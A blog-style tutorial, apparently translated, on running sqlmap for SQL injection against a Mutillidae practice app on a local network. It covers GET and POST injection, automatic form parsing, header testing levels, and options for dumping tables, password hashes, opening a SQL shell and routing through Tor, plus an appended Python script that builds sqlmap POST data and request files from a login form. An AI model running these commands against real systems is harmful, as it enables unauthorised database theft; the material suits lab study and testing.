Category: Networking and Security

2017-11-06 14:46:45

Up to now I have always done injection by hand; starting today I am using the tool sqlmap.

1. Start with injection via GET. Injecting through GET parameters is the simplest case, e.g.:

The page to inject is:

    http://192.168.0.105/mutillidae/index.php?page=user-info.php

The commands are as follows (the target URL goes between the quotes of -u):

    # use sqlmap to check whether the URL parameters are injectable
    sqlmap -u ""

    # list all databases
    sqlmap -u "" --dbs

    # show the current DBMS user
    sqlmap -u "" --current-user

    # list all tables and their structure
    sqlmap -u "" --schema

    # dump all rows of table accounts in database owasp10
    sqlmap -u "" --columns -T accounts -D owasp10 --dump

2. Injection via POST: the key point when passing POST data is to always include the submit button's parameter name and its default value, because the login handler only runs its query when that parameter is present.
For example, I tried to inject the following page:

    http://192.168.0.119/mutillidae/index.php?page=login.php

The correct form is:

    sqlmap -u "" --data="username=admin&password=admin&login-php-submit-button=login" --dbs
    # written as below, without the submit button, the result is "not injectable":
    sqlmap -u "" --data="username=admin&password=admin" --dbs

3. sqlmap can parse forms automatically (it fetches the page, extracts each form's action, method and input fields, including the submit button, and tests them), so the same thing can be done with:

    sqlmap --forms -u "" --dbs

4. Sometimes the injection point is in an HTTP header rather than a parameter. Raise --level to test them: at level 2 sqlmap also tests Cookie values, at level 3 the User-Agent and Referer headers, and at level 5 the Host header as well. Higher levels send many more requests, so use them only when the default tests find nothing:

    sqlmap --forms -u "" --dbs --level 5

5. Some other sqlmap parameters:

    sqlmap -r [HTTP_FILE]   # load the whole request (method, URL, headers, body) from a captured HTTP request file
    --method: force the HTTP method (GET or POST) instead of letting sqlmap choose.
    --data: the POST body to send; implies a POST request.
    -p: limit testing to the named injectable parameter(s).
    -f: perform an extensive fingerprint of the database.
    -b: retrieve the DBMS banner.
    --sql-shell: open an interactive SQL shell after successful exploitation.
    --schema: enumerate the database schema.
    --comments: check for DBMS comments during enumeration.
    --reg-read: read a Windows registry key value.
    --identify-waf: identify WAF/IPS protection in front of the target.

    Enumeration:
        These options can be used to enumerate the back-end database
        management system information, structure and data contained in the
        tables. Moreover you can run your own SQL statements.

        -a, --all        Retrieve everything
        -b, --banner     Retrieve DBMS banner
        --current-user   Retrieve DBMS current user
        --current-db     Retrieve DBMS current database
        --passwords      Enumerate DBMS users password hashes
        --tables         Enumerate DBMS database tables
        --columns        Enumerate DBMS database table columns
        --schema         Enumerate DBMS schema
        --dump           Dump DBMS database table entries
        --dump-all       Dump all DBMS databases tables entries
        -D DB            DBMS database to enumerate
        -T TBL           DBMS database table(s) to enumerate
        -C COL           DBMS database table column(s) to enumerate

    # The important arguments are:

        -u : The most important parameter: the URL the request is made to. For a POST request make sure you give the URL the form posts to (its action), which is not necessarily the page on which the form is displayed.
        --data : When you provide this argument, sqlmap performs POST requests automatically. The POST body can be written by hand; if you need help, capture it with a tool such as ZAP, Burp Suite or Live HTTP Headers.
        --threads=5 # use 5 threads

    # Some other useful arguments:

        --proxy : Tunnel all requests through a proxy. The protocol must be given as part of the proxy URL (e.g. http://127.0.0.1:8080).
        --proxy-cred : Credentials for the proxy server.
        --tor : Route requests through the Tor anonymity network (--tor-port and --tor-type are used if these settings differ from the defaults).
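The following is an added example, not code from the original post or from sqlmap itself. It ties together sections 2, 3 and the -r option above: it does by hand what sqlmap's --forms does, parsing a login form into the --data string (submit button and hidden fields included, which is why the manual --data in section 2 needed login-php-submit-button), and then renders the same request as the raw HTTP request file that sqlmap -r consumes. The HTML is a constructed stand-in for a Mutillidae-style login form; the field names follow the post, but the markup (including the hidden csrf field) is an assumption, not copied from Mutillidae.

```python
"""Added example: rebuild sqlmap --forms style POST data from a login form
and write it out as a request file for `sqlmap -r`."""
from html.parser import HTMLParser
from urllib.parse import urlencode, urljoin, urlsplit

# Constructed sample page (assumption, not Mutillidae's real markup).
# The submit button has a name and a value: a handler that checks for
# that parameter never runs the login query if it is missing from the body.
SAMPLE_HTML = """
<html><body>
<form action="index.php?page=login.php" method="post">
  <input type="text" name="username" value="">
  <input type="password" name="password" value="">
  <input type="hidden" name="csrf" value="abc123">
  <input type="submit" name="login-php-submit-button" value="login">
</form>
</body></html>
"""


class FormParser(HTMLParser):
    """Collect every form on a page with its action, method and named inputs."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action", ""),
                             "method": (a.get("method") or "get").upper(),
                             "fields": []}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None and a.get("name"):
            # Hidden fields and submit buttons are kept: the server expects
            # them, so they must be sent even though they are not injected.
            self._current["fields"].append((a["name"], a.get("value", "")))

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def form_to_data(html, page_url, defaults=None):
    """Return (target_url, method, data_string) for the first form on the page.

    `defaults` supplies values for fields the operator wants filled (e.g.
    admin/admin as in the post); fields with a value in the markup keep it.
    """
    parser = FormParser()
    parser.feed(html)
    form = parser.forms[0]
    defaults = defaults or {}
    pairs = [(name, defaults.get(name, value)) for name, value in form["fields"]]
    # The target is the form's action resolved against the page URL, which is
    # the URL -u must point at, not necessarily the page showing the form.
    return urljoin(page_url, form["action"]), form["method"], urlencode(pairs)


def raw_request(target_url, method, data):
    """Render the request as the plain-text file `sqlmap -r` reads."""
    u = urlsplit(target_url)
    path = u.path + ("?" + u.query if u.query else "")
    body = data if method == "POST" else ""
    lines = [f"{method} {path} HTTP/1.1", f"Host: {u.netloc}",
             "User-Agent: Mozilla/5.0"]
    if method == "POST":
        lines += ["Content-Type: application/x-www-form-urlencoded",
                  f"Content-Length: {len(body.encode())}"]
    return "\r\n".join(lines) + "\r\n\r\n" + body


def sqlmap_command(target_url, method, data):
    """Equivalent command line for the same request."""
    cmd = f'sqlmap -u "{target_url}"'
    if method == "POST":
        cmd += f' --data="{data}"'
    return cmd + " --dbs"


if __name__ == "__main__":
    page = "http://192.168.0.119/mutillidae/index.php?page=login.php"
    target, method, data = form_to_data(
        SAMPLE_HTML, page, {"username": "admin", "password": "admin"})
    print(sqlmap_command(target, method, data))
    # Redirect this to a file, e.g. login.req, then run: sqlmap -r login.req --dbs
    print(raw_request(target, method, data))
```

Run it and compare the generated --data string with the one in section 2: the submit button parameter appears automatically, and any hidden field the form carries is picked up as well, which is the advantage of --forms (or a captured request via -r) over typing --data by hand.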
